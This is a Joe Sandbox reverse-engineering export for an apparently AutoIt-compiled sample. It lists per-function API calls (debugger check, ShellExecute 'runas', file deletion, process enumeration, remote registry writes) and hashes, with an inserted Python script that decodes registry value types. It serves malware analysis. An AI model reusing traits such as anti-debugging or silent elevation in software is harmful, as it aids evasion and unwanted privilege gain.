                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                              • API String ID: 3290436268-3101561225
                                                                                              • Opcode ID: df05862b0e44998d76a2901b3c1b947bc2f8fc97f926dc7b3cbc895c30ca0193
                                                                                              • Instruction ID: 73ee32cd28ae86a407dc03fe26e8a7c46c53acfa27e257c35341c714c55c18e3
                                                                                              • Opcode Fuzzy Hash: df05862b0e44998d76a2901b3c1b947bc2f8fc97f926dc7b3cbc895c30ca0193
                                                                                              • Instruction Fuzzy Hash: C1A1D93190A7DBCFCB11CB7A7C4C1A97F956B66300B0858ADE6C1B3266C279854CCB76

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D632EF,?), ref: 00D63342
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D632EF,?), ref: 00D63355
                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E32418,00E32400,?,?,?,?,?,?,00D632EF,?), ref: 00D633C1
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                                • Part of subcall function 00D641E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D633E9,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00D64227
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00000001,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00D63442
                                                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00DA3C8A
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00DA3CCB
                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E231F4,00E32418,?,?,?,?,?,?,?,00D632EF), ref: 00DA3D54
                                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00DA3D5B
                                                                                                • Part of subcall function 00D6345A: GetSysColorBrush.USER32(0000000F), ref: 00D63465
                                                                                                • Part of subcall function 00D6345A: LoadCursorW.USER32(00000000,00007F00), ref: 00D63474
                                                                                                • Part of subcall function 00D6345A: LoadIconW.USER32(00000063), ref: 00D6348A
                                                                                                • Part of subcall function 00D6345A: LoadIconW.USER32(000000A4), ref: 00D6349C
                                                                                                • Part of subcall function 00D6345A: LoadIconW.USER32(000000A2), ref: 00D634AE
                                                                                                • Part of subcall function 00D6345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D634C6
                                                                                                • Part of subcall function 00D6345A: RegisterClassExW.USER32(?), ref: 00D63517
                                                                                                • Part of subcall function 00D6353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D63568
                                                                                                • Part of subcall function 00D6353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D63589
                                                                                                • Part of subcall function 00D6353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D632EF,?), ref: 00D6359D
                                                                                                • Part of subcall function 00D6353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D632EF,?), ref: 00D635A6
                                                                                                • Part of subcall function 00D638F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D639C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                              • String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                              • API String ID: 683915450-3328958999
                                                                                              • Opcode ID: 35be81d72e2b82e19dd5c1a590f36c2e3a5968afae949d69724beda81a9d136a
                                                                                              • Instruction ID: b6cbe1b064e31b3b8bfbc617e405f65d7a71a38ae86f58414b8838233fb1f1e1
                                                                                              • Opcode Fuzzy Hash: 35be81d72e2b82e19dd5c1a590f36c2e3a5968afae949d69724beda81a9d136a
                                                                                              • Instruction Fuzzy Hash: C551E430108345AFC705EF61AC0ADAEBFA6DF85714F04542DF5D1A61A2CF249A8DD772

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,76228FB0,?,00000000), ref: 00DD9FC0
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00DD9FFE
                                                                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 00DDA018
                                                                                              • FindNextFileW.KERNELBASE(00000000,?), ref: 00DDA030
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DDA03B
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00DDA057
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DDA0A7
                                                                                              • SetCurrentDirectoryW.KERNEL32(00E27B94), ref: 00DDA0C5
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDA0CF
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DDA0DC
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DDA0EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1409584000-438819550
                                                                                              • Opcode ID: 79248e90d22b71605df1539e17a0a26d8d831aea7865b610398581549a81ea3d
                                                                                              • Instruction ID: 2facbde3321af7cba488acf7dcd7c52a426891576e10ba4b9b39825a0bc23f55
                                                                                              • Opcode Fuzzy Hash: 79248e90d22b71605df1539e17a0a26d8d831aea7865b610398581549a81ea3d
                                                                                              • Instruction Fuzzy Hash: 9131C3326003196FDF10AFB8EC49AFE73AEAF05360F188096E555E2290DB34DE44DA75

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                                • Part of subcall function 00DCE9C5: GetFileAttributesW.KERNELBASE(?,00DCD755), ref: 00DCE9C6
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00DCD8E2
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DCD99D
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00DCD9B0
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DCD9CD
                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00DCD9F7
                                                                                                • Part of subcall function 00DCDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00DCD9DC,?,?), ref: 00DCDA72
                                                                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00DCDA13
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DCDA24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 1946585618-1173974218
                                                                                              • Opcode ID: da01ab6902453fb94428cacbe648eaf45b74e4d568051194a2cfa1a316720c1d
                                                                                              • Instruction ID: ce4b044f2839c9b59fc96b7db943a673fb92d6e564e84fc97548791dff0806dd
                                                                                              • Opcode Fuzzy Hash: da01ab6902453fb94428cacbe648eaf45b74e4d568051194a2cfa1a316720c1d
                                                                                              • Instruction Fuzzy Hash: 8A61093180514EABCF05EBA0DE52EEDB7B6AF15310F244069E446B71A1EB319F49CB70
                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                                • Part of subcall function 00DCE9C5: GetFileAttributesW.KERNELBASE(?,00DCD755), ref: 00DCE9C6
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00DCDBE0
                                                                                              • DeleteFileW.KERNELBASE(?,?,?,?), ref: 00DCDC30
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DCDC41
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DCDC58
                                                                                              • FindClose.KERNEL32(00000000), ref: 00DCDC61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2649000838-1173974218
                                                                                              • Opcode ID: 3bf752e11f4601566ee81b43644a7e93574cf27781929174f3523d0c461a50b6
                                                                                              • Instruction ID: ad2e20ec5d7bcafc9db9111ada83a90202703b1173ef20a417110d7ba7211af1
                                                                                              • Opcode Fuzzy Hash: 3bf752e11f4601566ee81b43644a7e93574cf27781929174f3523d0c461a50b6
                                                                                              • Instruction Fuzzy Hash: DC316F310083859BC300EB64DC959AFB7EAAE95310F44492EF4D2931A1EB60DA09CBB6
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00DCDCC1
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00DCDCCF
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00DCDCEF
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00DCDD9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 420147892-0
                                                                                              • Opcode ID: 4af48224fcd1a0770e421434882ddb2632cf4e3de600b52b493835113defdba1
                                                                                              • Instruction ID: 29b451c5006fa0a99fa23c7ae7f53bc1cd6ca7f8c85d49b51803921cfdc03087
                                                                                              • Opcode Fuzzy Hash: 4af48224fcd1a0770e421434882ddb2632cf4e3de600b52b493835113defdba1
                                                                                              • Instruction Fuzzy Hash: 79316A715083419BC301EF60DC85BABBBE9EF98350F04092DF586C71A1EB719985CBB2
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,00DA4686), ref: 00DCE397
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00DCE3A6
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00DCE3B7
                                                                                              • FindClose.KERNELBASE(00000000), ref: 00DCE3C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2695905019-0
                                                                                              • Opcode ID: bf6a00b993194173e044e29962b15f2cd984fb0f310f0c48d18c15591e7dac39
                                                                                              • Instruction ID: 288b2f883254f10b8f96cc3471266e57408a5c97e4e83dfe8648a7e1a806ea1b
                                                                                              • Opcode Fuzzy Hash: bf6a00b993194173e044e29962b15f2cd984fb0f310f0c48d18c15591e7dac39
                                                                                              • Instruction Fuzzy Hash: 01F0A070411A115782116B38AC0E9BA77AE9E41336B188719F875C32F0D7B0E9A586F9
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,00D8504E,?,00E298D8,0000000C,00D851A5,?,00000002,00000000), ref: 00D85099
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00D8504E,?,00E298D8,0000000C,00D851A5,?,00000002,00000000), ref: 00D850A0
                                                                                              • ExitProcess.KERNEL32 ref: 00D850B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: bcda8fe5ad3063b4bf1de8725e6c4c77ffcc4410017ede046e9deb0874664e0b
                                                                                              • Instruction ID: 15878a85de836061c71d179a6b222e986981161cf3fe476cf6d06d13d35ba648
                                                                                              • Opcode Fuzzy Hash: bcda8fe5ad3063b4bf1de8725e6c4c77ffcc4410017ede046e9deb0874664e0b
                                                                                              • Instruction Fuzzy Hash: 96E0B631800648AFCF227F54ED09E683B6BEB40381F448014F9058A226DB36ED42DBB1
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00DBE60A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID: X64
                                                                                              • API String ID: 2645101109-893830106
                                                                                              • Opcode ID: c3ca7d66b12612861c0736d1ac50fd8b182fa108771d290ad1e66e5988963124
                                                                                              • Instruction ID: 71e42b1b6f57f223f99498506f4bcd81a47a89626778181b59c104e4a527158b
                                                                                              • Opcode Fuzzy Hash: c3ca7d66b12612861c0736d1ac50fd8b182fa108771d290ad1e66e5988963124
                                                                                              • Instruction Fuzzy Hash: 61D0E9B581511DEACB90CB90EC88DDD777DBB18344F104595F546E2140DB74D6499B60

                                                                                              Control-flow Graph (entry block 00DECD16; interactive graph, node/edge listing not reproduced)
                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DECE1C
                                                                                              • RegCreateKeyExW.KERNELBASE(?,?,00000000,00DFDCD0,00000000,?,00000000,?,?), ref: 00DECEA3
                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DECF03
                                                                                              • _wcslen.LIBCMT ref: 00DECF53
                                                                                              • _wcslen.LIBCMT ref: 00DECFCE
                                                                                              • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00DED011
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DED120
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DED1AC
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 00DED1E0
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DED1ED
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DED2BF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 9721498-966354055
                                                                                              • Opcode ID: b157377c764fbbe167b297143335b6b4f3ae59aacb774c02ae8da00b33818e7a
                                                                                              • Instruction ID: 8fc45f9806ffc8a745db970a1e73ecad73ed49601f0a4aa42c76c0c790a1f363
                                                                                              • Opcode Fuzzy Hash: b157377c764fbbe167b297143335b6b4f3ae59aacb774c02ae8da00b33818e7a
                                                                                              • Instruction Fuzzy Hash: C4126A356043019FD714EF15C881A2AB7E6FF88714F08845DF99A9B3A2CB32ED41CBA1
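The four RegSetValueExW calls in the entry above pass dwType as a raw constant (00000001, 00000007, 0000000B, 00000003), while the entry's string list names REG_SZ, REG_EXPAND_SZ, REG_BINARY, REG_DWORD, REG_MULTI_SZ and REG_QWORD. The Python below is an editorial example added here; it is not part of the Joe Sandbox report and not code from the sample. It parses the report's "APIs" bullet format and decodes each write's value type and size using the winnt.h registry type constants. The sample input is copied from the entry above and labelled as constructed; the remark that this looks like an AutoIt RegWrite implementation is an inference from the REG_* strings and the AutoIt detections on the page, not something the report states.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: the "APIs" bullet lines of the report entry for the
# function whose entry block is 00DECD16, copied verbatim from the page.
SAMPLE_API_LINES = """
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DECE1C
• RegCreateKeyExW.KERNELBASE(?,?,00000000,00DFDCD0,00000000,?,00000000,?,?), ref: 00DECEA3
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DECF03
• _wcslen.LIBCMT ref: 00DECF53
• RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00DED011
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DED120
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DED1AC
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DED2BF
"""

# Registry value type constants from winnt.h, used to decode the dwType argument.
REG_TYPES = {
    0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
    4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD",
}

# One bullet line: "<api>.<module>(<args>), ref: <hex>" or "<api>.<module> ref: <hex>"
LINE_RE = re.compile(
    r"^•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


def parse_api_lines(text: str) -> List[Dict]:
    """Turn the report's API bullet lines into call records, keeping page order."""
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # headers such as "APIs" or "Strings" are skipped
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),  # address of the call site
        })
    return calls


def arg_value(arg: str) -> Optional[int]:
    """The report prints resolved arguments as hex and unresolved ones as '?'."""
    arg = arg.strip()
    return None if arg == "?" else int(arg, 16)


def decode_regsetvalue(calls: List[Dict]) -> List[Dict]:
    """Decode dwType (4th argument) and cbData (6th argument) of every RegSetValueExW call.

    Prototype: RegSetValueExW(hKey, lpValueName, Reserved, dwType, lpData, cbData).
    """
    writes = []
    for c in calls:
        if c["api"] != "RegSetValueExW" or len(c["args"]) < 6:
            continue
        dw_type = arg_value(c["args"][3])
        writes.append({
            "ref": c["ref"],
            "type": REG_TYPES.get(dw_type, f"unknown({dw_type})"),
            "cbData": arg_value(c["args"][5]),
        })
    return writes


def api_sequence(calls: List[Dict]) -> List[str]:
    """API names ordered by call-site address, i.e. roughly the routine's layout."""
    return [c["api"] for c in sorted(calls, key=lambda c: c["ref"])]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    print(" -> ".join(api_sequence(parsed)))
    for w in decode_regsetvalue(parsed):
        print(f"{w['ref']:08X}: {w['type']} cbData={w['cbData']}")
```

Decoded, the writes at 00DED011, 00DED120, 00DED1AC and 00DED2BF are REG_SZ, REG_MULTI_SZ, REG_QWORD and REG_BINARY. The REG_QWORD call carrying cbData=8 is the built-in sanity check on the decode, and the REG_BINARY call passes lpData=0 with cbData=0, an empty binary value. A routine that connects to a registry, creates a key and then dispatches on all of these value types is consistent with an interpreter's generic registry-write primitive (AutoIt's RegWrite accepts exactly these REG_* names as its type argument), which fits the AutoIt detections on this page; that attribution is an assumption, not a finding of the report.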

                                                                                              Control-flow Graph (entry block 00D63E15; interactive graph, node/edge listing not reproduced)
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 0-1645009161
                                                                                              • Opcode ID: db758bbe1bd8f7a26192d7b81f64cf07fa8cb2ad7a906b26d5262a25f57ef3f9
                                                                                              • Instruction ID: 854a1040f777e3a6e0fd49a8511374bdfbecd5ec956c84c043c32722d447642f
                                                                                              • Opcode Fuzzy Hash: db758bbe1bd8f7a26192d7b81f64cf07fa8cb2ad7a906b26d5262a25f57ef3f9
                                                                                              • Instruction Fuzzy Hash: B6812671A44306BFDB10AF64CC46FBE7BA9EF56700F084024F945AA182EBB1DA05C7B5
                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 00D6EEB7
                                                                                              • timeGetTime.WINMM ref: 00D6F0B7
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D6F1D8
                                                                                              • TranslateMessage.USER32(?), ref: 00D6F22B
                                                                                              • DispatchMessageW.USER32(?), ref: 00D6F239
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D6F24F
                                                                                              • Sleep.KERNELBASE(0000000A), ref: 00D6F261
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                              • String ID:
                                                                                              • API String ID: 2189390790-0
